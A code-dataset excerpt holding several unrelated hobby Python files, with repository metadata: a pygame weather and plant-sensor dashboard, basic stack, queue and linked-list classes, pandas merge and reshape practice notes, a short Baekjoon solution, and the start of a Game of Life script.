<= H20 <= (maximum/30)*15:\n image = imageDirectory + \"frame_13_delay-0.33s.png\"\n\n elif (maximum/30)*15 <= H20 <= (maximum/30)*16:\n image = imageDirectory + \"frame_14_delay-0.33s.png\"\n\n elif (maximum/30)*16 <= H20 <= (maximum/30)*17:\n image = imageDirectory + \"frame_15_delay-0.33s.png\"\n\n elif (maximum/30)*17 <= H20 <= (maximum/30)*18:\n image = imageDirectory + \"frame_16_delay-0.33s.png\"\n\n elif (maximum/30)*18 <= H20 <= (maximum/30)*19:\n image = imageDirectory + \"frame_17_delay-0.33s.png\"\n\n elif (maximum/30)*19 <= H20 <= (maximum/30)*20:\n image = imageDirectory + \"frame_18_delay-0.33s.png\"\n\n elif (maximum/30)*20 <= H20 <= (maximum/30)*21:\n image = imageDirectory + \"frame_19_delay-0.33s.png\"\n\n elif (maximum/30)*21 <= H20 <= (maximum/30)*22:\n image = imageDirectory + \"frame_20_delay-0.33s.png\"\n\n elif (maximum/30)*22 <= H20 <= (maximum/30)*23:\n image = imageDirectory + \"frame_21_delay-0.33s.png\"\n\n elif (maximum/30)*23 <= H20 <= (maximum/30)*24:\n image = imageDirectory + \"frame_22_delay-0.33s.png\"\n\n elif (maximum/30)*24 <= H20 <= (maximum/30)*25:\n image = imageDirectory + \"frame_23_delay-0.33s.png\"\n\n elif (maximum/30)*25 <= H20 <= (maximum/30)*26:\n image = imageDirectory + \"frame_24_delay-0.33s.png\"\n\n elif (maximum/30)*26 <= H20 <= (maximum/30)*27:\n image = imageDirectory + \"frame_25_delay-0.33s.png\"\n\n elif (maximum/30)*27 <= H20 <= (maximum/30)*28:\n image = imageDirectory + \"frame_26_delay-0.33s.png\"\n\n elif (maximum/30)*28 <= H20 <= (maximum/30)*29:\n image = imageDirectory + \"frame_27_delay-0.33s.png\"\n\n elif (maximum/30)*29 <= H20 >= maximum:\n image = imageDirectory + \"frame_28_delay-0.33s.png\"\n\n elif H20 >= maximum:\n image = imageDirectory + \"frame_29_delay-0.33s.png\"\n\n loadingicon = pygame.image.load(image)\n loadingicon = pygame.transform.scale(loadingicon, (200, 200))\n screen.blit(loadingicon, (20, 450))\n\ndef GetTempData(imageDirectory, fontDirectory):\n x = datetime.datetime.now()\n url = 'http://openweathermap.org/data/2.5/weather?q={}&appid=b6907d289e10d714a6e88b30761fae22'.format(\"Nashua\")\n res = requests.get(url)\n data = res.json()\n temp = data['main']['temp']\n templow = data['main']['temp_min']\n templow = templow*(9/5) + 32\n temphigh = data['main']['temp_max']\n temphigh = temphigh*(9/5) + 32\n weathers = data['weather'][0]['main']\n temp = temp*(9/5) + 32\n return temp, templow, temphigh, weathers\n\ndef GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory):\n x = datetime.datetime.now()\n if temp <= 40:\n status = 'Cold'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n elif temp >= 80:\n status = 'Hot'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n else:\n status = 'Mild'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n if weathers == 'Rain':\n weathericon = pygame.image.load(imageDirectory + \"rain.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Clouds':\n weathericon = pygame.image.load(imageDirectory + \"clouds.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Snow':\n weathericon = pygame.image.load(imageDirectory + \"snow.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Clear':\n weathericon = pygame.image.load(imageDirectory + \"Clear.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n return DNweathericon, Wweathericon, ColdHotMild\n\n\ndef displayWeatherData(imageDirectory, fontDirectory):\n temperature = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 75)\n Temps = temperature.render(str(int(temp)) + \" F\", 50, (255, 255, 255))\n temperaturelow = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 20)\n low = temperaturelow.render(str(int(templow))+ \" F\", 25, (255, 255, 255))\n temperaturehigh = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 20)\n high = temperaturehigh.render(str(int(temphigh))+ \" F\", 25, (255, 255, 255))\n screen.blit(Temps, (20, 20))\n screen.blit(low, (330, 120))\n screen.blit(high, (400, 120))\n screen.blit(DNweathericon, (340, 10))\n screen.blit(Wweathericon, (220, 10))\n screen.blit(ColdHotMild, (20, 100))\n\ndef Title(imageDirectory, fontDirectory):\n Title = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n title = Title.render(\"Battery Life\", 50, (255, 255, 255))\n screen.blit(title, (250, 525))\n\n\ndef Time(imageDirectory, fontDirectory):\n z = datetime.datetime.now()\n screen.fill((0,0,0))\n Time = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 50)\n Time1 = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n Time2 = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 25)\n y = Time.render(z.strftime(\"%H:%M:%S\"), 50, (255, 255, 255))\n q = Time1.render(z.strftime(\"%b %d %Y\"), 50, (255, 255, 255))\n screen.blit(y, (780, 20))\n screen.blit(q, (790, 80))\n if 6 <= int(z.strftime(\"%H\")) <= 13:\n d = Time2.render(\"Good Morning!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n if 14 <= int(z.strftime(\"%H\")) <= 16:\n d = Time2.render(\"Good Afternoon!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n if int(z.strftime(\"%H\")) >= 17 or int(z.strftime(\"%H\")) <= 5:\n d = Time2.render(\"Good Evening!\", 50, (255, 255, 255))\n screen.blit(d, (790, 110))\n\nfinished = False\n\nurl = 'http://openweathermap.org/data/2.5/weather?q={}&appid=b6907d289e10d714a6e88b30761fae22'.format(\"Nashua\")\n\ni = 0\nprevious_temp = 0.0\nprevious_weathers = \"now\"\nprevious_time = 0\nprevious_temp = 0.0\nprevious_tempLow = 0.0\nprevious_tempHigh = 0.0\nvalues = {\n \"bool\": 0,\n \"time\": 1,\n \"place\": 2,\n \"plantname\": 3,\n \"humidity\": 4,\n \"temperature\": 5,\n \"wateranalog\": 6\n}\nlife = 1\nprevious = {\n \"place\": 0,\n \"plantname\": 0,\n \"humidity\": 0,\n \"temperature\": 0,\n \"wateranalog\": 0\n}\nnow = time.time()\nfuture = now + 10\ni = 0\nhumidity = 0\ntemperatures = 0\nwateranalog = 0\n\n## create control Panel object.\n#controlPanel_new = ControlPanel_main(previousImage, newImage)\npreviousRes = 0\nnewRes = 0\npreviousImage = imageDirectory + \"beginning.png\"\nnewImage = imageDirectory + \"beginning.png\"\nfirstTime = 0\ncontrolPanel_new = ControlPanel_main(previousImage, newImage)\n\nwhile not finished:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n if i == 0:\n temp, templow, temphigh, weathers = GetTempData(imageDirectory, fontDirectory)\n DNweathericon, Wweathericon, ColdHotMild = GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory)\n Time(imageDirectory, fontDirectory)\n Title(imageDirectory, fontDirectory)\n new_time = int(time.time())\n if new_time - previous_time > 60:\n #print(\"timer exceeded\")\n #print(new_time)\n temp, templow, temphigh, weathers = GetTempData(imageDirectory, fontDirectory)\n if temp != previous_temp \\\n or templow != previous_tempLow \\\n or temphigh != previous_tempHigh \\\n or weathers != previous_weathers:\n #print(\"temp info is different\")\n DNweathericon, Wweathericon, ColdHotMild = GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory)\n previous_temp = temp\n previous_temLow = templow\n previous_tempHigh = temphigh\n previous_weathers = weathers\n previous_time = new_time\n displayWeatherData(imageDirectory, fontDirectory)\n CarbonDioxide(1000, imageDirectory, fontDirectory)\n Megamanand10800A(imageDirectory, fontDirectory)\n ResetButton(imageDirectory, fontDirectory)\n ControlPanelButton(imageDirectory, fontDirectory, screen)\n finish = ControlPanelButton(imageDirectory, fontDirectory, screen)\n #print(\"hello\" + str(finish))\n r = requests.get(\"http://192.168.1.24:5263/\")\n text = r.text\n if \"

    \" in text:\n if i == 0:\n humidity = str(text[50:54])\n if humidity != \"None\":\n humidity = float(humidity)\n #print(humidity)\n if i == 1:\n temperatures = str(text[64:68])\n #print(temperature)\n if temperatures != \"None\": #o/r temperature != \"itio\":\n temperatures = float(temperatures)\n #print(temperature)\n if i == 2:\n wateranalog = str(text[78:81])\n if \"<\" in wateranalog:\n print(\"<\")\n wateranalog = str(text[78:79])\n if wateranalog != \"None\": # or wateranalog != \"itio\":\n wateranalog = float(wateranalog)\n #print(temperature)\n\n i = i + 1\n if i == 2:\n i = 0\n new = {\n \"place\": 0,\n \"plantname\": 0,\n \"humidity\": humidity,\n \"temperature\": temperatures,\n \"wateranalog\": wateranalog\n }\n if time.time() > future:\n for key in new.keys():\n if new[key] != previous[key]:\n print(\"not matching\")\n new1 = Data(\"1\", datetime.datetime.now(), new[\"place\"], new[\"plantname\"], new[\"humidity\"], new[\"temperature\"], new[\"wateranalog\"])\n new1.InsertData()\n future = future + 10\n previous[key] = new[key]\n if life == 0:\n x = Data(\"1\", datetime.datetime.now(), new[\"place\"], new[\"plantname\"], new[\"humidity\"], new[\"temperature\"], new[\"wateranalog\"])\n data = x.GetAllData()\n sum = 0\n average = 0\n i = 0\n for values in data[0:]:\n sum = sum + values[5]\n i = i + 1\n average = sum/i\n print(average)\n if finish == True:\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n if firstTime == 0:\n newRes, newImage = controlPanel_new.ControlPanel(event, previousRes)\n firstTime = firstTime + 1\n if previousRes != newRes:\n previousRes = newRes\n previousImage = newImage\n if event.type == pygame.MOUSEBUTTONDOWN:\n newRes, newImage = controlPanel_new.ControlPanel(event, previousRes)\n if previousRes != newRes:\n previousRes = newRes\n previousImage = newImage\n fini = controlPanel_new.Arrowbutton(event, screen)\n if fini == False:\n finish = False\n break\n pygame.display.flip()\n\n i = i + 1\n pygame.display.update()\n clock.tick(60)\n","repo_name":"AtulPhadke/Energy","sub_path":"app/mainscreen.py","file_name":"mainscreen.py","file_ext":"py","file_size_in_byte":21856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40924071251","text":"from typing import Any, Dict, Optional, List\n\nclass Stack:\n \"\"\"\n A class to create an instance of a Stack data structure with methods of insertion and deletion, based\n on First In Last Out principle.\n \"\"\"\n def __init__(self):\n self.stack = []\n\n def push(self, element: Any) -> List:\n \"\"\"Insert element at top of stack (end of list)\"\"\"\n return self.stack.append(element)\n\n def pop(self) -> List:\n \"\"\"Remove element from top of stack (end of list)\"\"\"\n return self.stack.pop()\n\n def length(self) -> int:\n \"\"\"Returns the length of the stack\"\"\"\n return len(self.stack)\n\n def empty(self) -> List:\n \"\"\"Empties the stack\"\"\"\n self.stack = []\n return self.stack\n\n def top(self) -> Any:\n \"\"\"Returns the top of the stack\"\"\"\n if len(self.stack) == 0:\n return None\n return self.stack[-1]\n\n def get_stack(self) -> List:\n return self.stack\n\n\nclass Queue:\n \"\"\"\n A class to create an instance of a Queue data structure with methods of insertion and deletion, based on\n First In First Out principle.\n \"\"\"\n def __init__(self):\n self.queue = []\n\n def enqueue(self, element) -> List:\n \"\"\"Insert element at the back of the queue (start of list)\"\"\"\n return self.queue.insert(0, element)\n\n def dequeue(self) -> List:\n \"\"\"Remove element from front of queue (end of list)\"\"\"\n return self.queue.pop()\n\n def length(self) -> int:\n \"\"\"Returns the length of the queue\"\"\"\n return len(self.queue)\n\n def empty(self) -> List:\n \"\"\"Empties the queue\"\"\"\n self.queue = []\n return self.queue\n\n def front(self) -> Any:\n \"\"\"Returns the value at front of the queue\"\"\"\n if len(self.queue) == 0:\n return None\n return self.queue[-1]\n\n def get_queue(self) -> List:\n \"\"\"Returns whole queue\"\"\"\n return self.queue\n\n\nclass Node:\n def __init__(self, data: Any) -> None:\n self.data = data\n self.next = None\n\n def __repr__(self):\n return self.data\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def __repr__(self):\n if self.head is None:\n return None\n else:\n n = self.head\n nodes = []\n while n is not None:\n nodes.append(n.data)\n n = n.next\n return str(nodes)\n\n def insert_at_start(self, data: Any) -> None:\n \"\"\"Creates new node, links the node to the current head, and replaces itself as new head\"\"\"\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n def insert_at_end(self, data: Any) -> None:\n \"\"\"Creates new node, checks if head is empty, if so create head. If not, loops through nodes until find one with\n no next node.\"\"\"\n new_node = Node(data)\n if self.head is None:\n self.head = new_node\n return\n\n n = self.head\n while n.next is not None:\n n = n.next\n n.next = new_node\n\n def insert_after_item(self, x: Any, data: Any) -> None:\n \"\"\"Inserts a node after a specific item, can be within the linked list.\"\"\"\n n = self.head\n while n is not None:\n if n.data == x:\n break\n n = n.next\n\n if n is None:\n print('List is empty')\n else:\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def insert_before_item(self, x: Any, data: Any) -> None:\n \"\"\"Inserts a node before a specific item, can be within the linked list\"\"\"\n n = self.head\n if n is None:\n print(\"It's empty\")\n\n elif n.data == x:\n new_node = Node(data)\n new_node.next = n.next\n self.head = new_node\n\n else:\n while n is not None:\n if n.next.data == x:\n break\n n = n.next\n\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def insert_at_index(self, index: int, data: Any) -> None:\n \"\"\"Inserts a node at a specific index\"\"\"\n if index == 0:\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n return\n i = 1\n n = self.head\n while i < index-1 and n is not None:\n n = n.next\n i = i+1\n if n is None:\n print(\"Index out of bound\")\n else:\n new_node = Node(data)\n new_node.next = n.next\n n.next = new_node\n\n def get_count(self) -> int:\n \"\"\"Returns the length of a linked list\"\"\"\n n = self.head\n if n is None:\n return 0\n\n count = 0\n while n is not None:\n count += 1\n n = n.next\n\n return count\n\n def search_element(self, val: Any) -> bool:\n \"\"\"Checks for an element in the linked list\"\"\"\n n = self.head\n if n is None:\n return False\n\n while n is not None:\n if n.data == val:\n return True\n else:\n n = n.next\n\n return False\n\n def delete_at_start(self) -> None:\n \"\"\"Deletes first node from the list.\"\"\"\n if self.head is None:\n print('List is empty')\n return\n self.head = self.head.next\n\n def delete_at_end(self) -> None:\n \"\"\"Deletes last node from the list.\"\"\"\n if self.head is None:\n print('List is empty')\n return\n\n n = self.head\n while n.next.next is not None:\n n = n.next\n n.next = None\n\n def delete_item_val(self, val: Any) -> None:\n \"\"\"Deletes item by value\"\"\"\n if self.head is None:\n print(\"List is empty\")\n return\n\n # Delete first item\n if self.head.data == val:\n self.head = self.head.next\n return\n\n # Delete any others\n n = self.head\n while n.next is not None:\n if n.next.data == val:\n break\n n = n.next\n\n if n.next is None:\n print(\"Item not found in list\")\n else:\n n.next = n.next.next\n\n def reverse_llist(self) -> None:\n prev = None\n n = self.head\n while n is not None:\n next = n.next\n n.next = prev\n prev = n\n n = next\n self.head = prev\n\n\n#\n#\n# llist = LinkedList()\n#\n# llist.insert_at_start(5)\n# llist.insert_at_start(4)\n# llist.insert_at_start(3)\n# llist.insert_at_start(1)\n#\n# print(llist)\n#\n# llist.insert_before_item(3, 2)\n#\n# print(llist)\n#\n# llist.reverse_llist()\n#\n# print(llist)","repo_name":"micullen/DataStructs-Algorithms","sub_path":"structs.py","file_name":"structs.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21358673585","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 2 13:56:55 2018\n\n@author: Teresa\n\"\"\"\nimport numpy as np\nimport pandas as pd\ndata = pd.Series(np.random.randn(9),\n index=[['a', 'a', 'a', 'b', 'b', 'c', 'c', 'd', 'd'],\n [1,2,3,1,3,1,2,2,3]])\ndata\ndata.index\ndata['b']\ndata['b':'c']\ndd = pd.Series(np.random.randn(5))\ndd[3:5]\ndata.loc[['b', 'd']] # .iloc only takes integer\ndd = pd.DataFrame(np.random.randn(5,4))\ndd.loc[[1,2], [2,3]]\ndd[[1,2]]\ndd\ndata\ndata.loc[:,2] # all of the first level, 2nd from all the second level think second level as columns\ndata.unstack() # rearrange data into a data frame\ndata.unstack().stack()\nframe = pd.DataFrame(np.arange(12).reshape((4, 3)),\n index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],\n columns=[['Ohio', 'Ohio', 'Colorado'],\n ['Green', 'Red', 'Green']])\nframe\n# with a data frame, either axis can have a hierarchical index\nframe.index.names = ['key1', 'key2']\nframe.columns.names = ['state', 'color']\nframe\nframe['Ohio']\nframe.loc['a']\nfrom pandas import MultiIndex\nMultiIndex.from_arrays([['Ohio', 'Ohio', 'Colorado'], ['Green', 'Red', 'Green']], \n names=['state', 'color'])\n\nframe.swaplevel('key1', 'key2')\nframe.sort_index(level=1)\nframe.swaplevel(0,1).sort_index(level=0)\nframe.sum(level='key2')\nframe.sum(level='color', axis=1) # since color is column index, need to set axis=1\nframe = pd.DataFrame({'a': range(7), 'b': range(7, 0, -1),\n 'c':['one', 'one', 'one', 'two', 'two', 'two', 'two'],\n 'd':[0,1,2,0,1,2,3]})\nframe \nframe2 = frame.set_index(['c', 'd']) \nframe2\nframe.set_index(['c', 'd'], drop=False)\nframe2.reset_index()\ndf1 = pd.DataFrame({'key': ['b', 'b', 'a', 'c', 'a', 'a', 'b'],\n 'data1': range(7)})\ndf2 = pd.DataFrame({'key': ['a', 'b', 'd'], \n 'data2': range(3)})\ndf1\ndf2\npd.merge(df1, df2) # without specification, merge user the overlapping column names as keys\npd.merge(df1, df2, on='key')\ndf3 = pd.DataFrame({'lkey': ['b', 'b', 'a', 'c', 'a', 'a', 'b'],\n 'data1': range(7)})\ndf4 = pd.DataFrame({'rkey': ['a', 'b', 'd'],\n 'data2': range(3)})\npd.merge(df3, df4, left_on='lkey', right_on='rkey')\npd.merge(df1, df2, how='outer')\ndf1 = pd.DataFrame({'key': ['b', 'b', 'a', 'c', 'a', 'b'],\n 'data1': range(6)})\ndf2 = pd.DataFrame({'key': ['a', 'b', 'a', 'b', 'd'],\n 'data2': range(5)})\ndf1\ndf2\npd.merge(df1, df2, on='key', how='left')\npd.merge(df1, df2, how='inner')\nleft = pd.DataFrame({'key1': ['foo', 'foo', 'bar'],\n 'key2': ['one', 'two', 'one'],\n 'lval': [1, 2, 3]})\nright = pd.DataFrame({'key1': ['foo', 'foo', 'bar', 'bar'],\n 'key2': ['one', 'one', 'one', 'two'],\n 'rval': [4, 5, 6, 7]})\nleft\nright\npd.merge(left, right, on=['key1', 'key2'], how='outer')\npd.merge(left, right, on='key1')\npd.merge(left, right, on ='key1', suffixes=('_left', '_right'))\nleft1 = pd.DataFrame({'key': ['a', 'b', 'a', 'a', 'b', 'c'],\n 'value': range(6)})\nright1 = pd.DataFrame({'group_val': [3.5, 7]}, index=['a', 'b'])\nleft1\nright1\npd.merge(left1, right1, left_on='key', right_index=True) \n# 'key' is the column left data frame use to merge, \n# while right data frame user its index, hence right_index=True\npd.merge(left1, right1, left_on='key', right_index=True, how='outer')\nlefth = pd.DataFrame({'key1': ['Ohio', 'Ohio', 'Ohio',\n 'Nevada', 'Nevada'],\n 'key2': [2000, 2001, 2002, 2001, 2002],\n 'data': np.arange(5.)})\nrighth = righth = pd.DataFrame(np.arange(12).reshape((6, 2)),\n index=[['Nevada', 'Nevada', 'Ohio', 'Ohio','Ohio', 'Ohio'],\n [2001, 2000, 2000, 2000, 2001, 2002]],\n columns=['event1', 'event2']) \nlefth\nrighth\npd.merge(lefth, righth, left_on=['key1', 'key2'], right_index=True)\npd.merge(lefth, righth, left_on=['key1', 'key2'], right_index=True, how='outer')\nleft2 = pd.DataFrame([[1., 2.], [3., 4.], [5., 6.]],\n index=['a', 'c', 'e'],\n columns=['Ohio', 'Nevada'])\nright2 = pd.DataFrame([[7., 8.], [9., 10.], [11., 12.], [13, 14]],\n index=['b', 'c', 'd', 'e'],\n columns=['Missouri', 'Alabama'])\nleft2\nright2\npd.merge(left2, right2, how='outer', left_index=True, right_index=True)\nleft2.join(right2, how='outer') # join is merging by index, can be used to add columns\nleft1.join(right1, on='key') # left join\nanother = pd.DataFrame([[7., 8.], [9., 10.], [11., 12.], [16., 17.]],\n index=['a', 'c', 'e', 'f'],\n columns=['New York', 'Oregon'])\nanother\nleft2\nright2\nleft2.join([right2, another])\nleft2.join([right2, another], how='outer')\narr = np.arange(12).reshape((3, 4))\narr\nnp.concatenate([arr, arr], axis=1)\ns1 = pd.Series([0, 1], index=['a', 'b'])\ns2 = pd.Series([2, 3, 4], index=['c', 'd', 'e'])\ns3 = pd.Series([5, 6], index=['f', 'g'])\ns1\ns2\ns3\npd.concat([s1, s2, s3]) # by default concat works along axis=0\npd.concat([s1, s2, s3], axis=1)\ns4 = pd.concat([s1, s3])\ns4\ns1\npd.concat([s1, s4], axis=1)\npd.concat([s1, s4], axis=1, join='inner')\ns1\npd.concat([s1, s4], axis=1, join_axes=[['a', 'c', 'b', 'e']])\ns1\ns3\nresult = pd.concat([s1, s1, s3], keys=['one', 'two', 'three'])\nresult\nresult.unstack()\npd.concat([s1, s1, s3], axis=1, keys=['one', 'two','three'])\ndf1 = pd.DataFrame(np.arange(6).reshape(3, 2), index=['a', 'b', 'c'],\n columns=['one', 'two'])\ndf2 = pd.DataFrame(5 + np.arange(4).reshape(2, 2), index=['a', 'c'],\n columns=['three', 'four'])\ndf1\ndf2\npd.concat([df1, df2], axis=1, keys=['level1', 'level2'])\npd.concat({'level1':df1, 'level2':df2}, axis=1)\npd.concat([df1, df2], axis=1, keys=['level1', 'level2'],\n names=['upper', 'lower'])\ndf1 = pd.DataFrame(np.random.randn(3, 4), columns=['a', 'b', 'c', 'd'])\ndf2 = pd.DataFrame(np.random.randn(2, 3), columns=['b', 'd', 'a'])\ndf1\ndf2\npd.concat([df1, df2], ignore_index=True)\na = pd.Series([np.nan, 2.5, np.nan, 3.5, 4.5, np.nan],\n index=['f', 'e', 'd', 'c', 'b', 'a'])\nb = pd.Series(np.arange(len(a), dtype=np.float64),\n index=['f', 'e', 'd', 'c', 'b', 'a'])\na\nb\nb[-1]=np.nan\nb\nnp.where(pd.isnull(a), b, a)\nb[:-2].combine_first(a[2:])\na.combine_first(b)\ndf1 = pd.DataFrame({'a': [1., np.nan, 5., np.nan],\n 'b': [np.nan, 2., np.nan, 6.],\n 'c': range(2, 18, 4)})\ndf2 = pd.DataFrame({'a': [5., 4., np.nan, 3., 7.],\n 'b': [np.nan, 3., 4., 6., 8.]})\ndf1\ndf2\ndf1.combine_first(df2)\n\ndata = pd.DataFrame(np.arange(6).reshape((2, 3)),\n index=pd.Index(['Ohio', 'Colorado'], name='state'),\n columns=pd.Index(['one', 'two', 'three'],name='number'))\ndata\nresult = data.stack()\nresult\nresult.unstack() # by default the innermost level is unstackerd, same with stack\nresult.unstack(0)\nresult.unstack('state')\ns1 = pd.Series([0, 1, 2, 3], index=['a', 'b', 'c', 'd'])\ns2 = pd.Series([4, 5, 6], index=['c', 'd', 'e'])\ndata2 = pd.concat([s1, s2], keys=['one','two'])\ndata2\ndata2.unstack()\ndata2.unstack().stack()\ndata2.unstack().stack(dropna=False)\ndata2\ndf = pd.DataFrame({'left': result, 'right': result + 5},\n columns=pd.Index(['left', 'right'], name='side'))\ndf\nresult\ndf.unstack('state')\ndf.unstack('state').stack('side')\n\ndata = pd.read_csv('../examples/macrodata.csv')\ndata.head()\nperiods = pd.PeriodIndex(year=data.year, quarter=data.quarter, name='date')\ncolumns = pd.Index(['realgdp', 'infl', 'unemp'], name='item')\ndata = data.reindex(columns=columns)\ndata.head()\ndata.index = periods.to_timestamp('D', 'end')\ndata.head()\nldata = data.stack().reset_index().rename(columns={0:'value'})\nldata.head()\npivoted = ldata.pivot(index = 'date', columns='item', values='value')\npivoted.head()\nldata['value2'] = np.random.randn(len(ldata))\nldata[:10]\npivoted = ldata.pivot('date', 'item')\npivoted.head()\npivoted['value'].head()\nldata.set_index(['date', 'item']).unstack('item')\ndf = pd.DataFrame({'key': ['foo', 'bar', 'baz'],\n 'A': [1, 2, 3],\n 'B': [4, 5, 6],\n 'C': [7, 8, 9]})\ndf\nmelted = pd.melt(df, ['key']) # indicate group indicators\nmelted\ndf.melt('key')\nreshaped = melted.pivot('key', 'variable', 'value')\nreshaped\nreshaped.reset_index()\npd.melt(df, id_vars=['key'], value_vars = ['A', 'B'])\npd.melt(df,value_vars=['A', 'B'])\npd.melt(df,value_vars=['key', 'A', 'B'])\n","repo_name":"littlesweet1129/learning","sub_path":"data_analysis/pydata-book/ch08.py","file_name":"ch08.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41129928879","text":"import sys\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n H ,W, N = map(int, input().split())\n q, r = divmod(N, H)\n if r==0:\n front = str(H)\n else:\n front = str(r)\n\n if (r != 0) and (q < 9):\n print(front + '0' + str(q+1) )\n elif (r == 0) and (q < 10):\n print(front + '0' + str(q))\n elif (r != 0) and (q >= 9):\n print(front + str(q+1) )\n elif (r == 0) and (q >= 10):\n print(front + str(q))","repo_name":"pgw928/TIL","sub_path":"algorithms/boj/mAth/10250.py","file_name":"10250.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11903251034","text":"import msvcrt\nimport threading\n\nfrom graphics import *\nfrom time import sleep\n\n# funcs\n# todo: init all cell (dead & alive)\n# todo: cell.enable()\n# todo: cell.disable()\n\nDEAD = color_rgb(10, 10, 50)\nALIVE = color_rgb(230, 255, 230)\n\n\ndef is_alive(cell):\n return cell.config['fill'] == ALIVE\n\n\ndef init_grid(dim):\n grid = [[0 for cell in range(dim)] for line in range(dim)]\n for i in range(dim):\n for j in range(dim):\n grid[i][j] = set_cell(i, j)\n return grid\n\n\ndef draw_grid(grid, dim, window):\n for i in range(dim):\n for j in range(dim):\n grid[i][j].draw(window)\n\n\ndef set_cell(x, y):\n cell = Rectangle(Point(x, y), Point(x + 1, y + 1))\n cell.setFill(DEAD)\n return cell\n\n\ndef enable_cell(grid, x, y):\n grid[x][y].setFill(ALIVE)\n return grid\n\n\ndef disable_cell(grid, x, y):\n grid[x][y].setFill(DEAD)\n return grid\n\n\ndef around_coords(x, y):\n coords = list()\n coords.append(Point(x, y + 1))\n coords.append(Point(x + 1, y + 1))\n coords.append(Point(x + 1, y))\n coords.append(Point(x + 1, y - 1))\n coords.append(Point(x, y - 1))\n coords.append(Point(x - 1, y + 1))\n coords.append(Point(x - 1, y))\n coords.append(Point(x - 1, y - 1))\n return coords\n\n\ndef in_binding(point: Point, dim):\n return point.x in range(dim) and point.y in range(dim)\n\n\ndef update_grid(grid, dim):\n for i in range(dim):\n for j in range(dim):\n # check 8 cells around\n alive_count = 0\n for coord in around_coords(i, j): # for each coord around\n if in_binding(coord, dim):\n rcell = grid[coord.x.__int__()][coord.y.__int__()]\n if is_alive(rcell):\n alive_count = alive_count + 1\n # decide cell's fate\n if 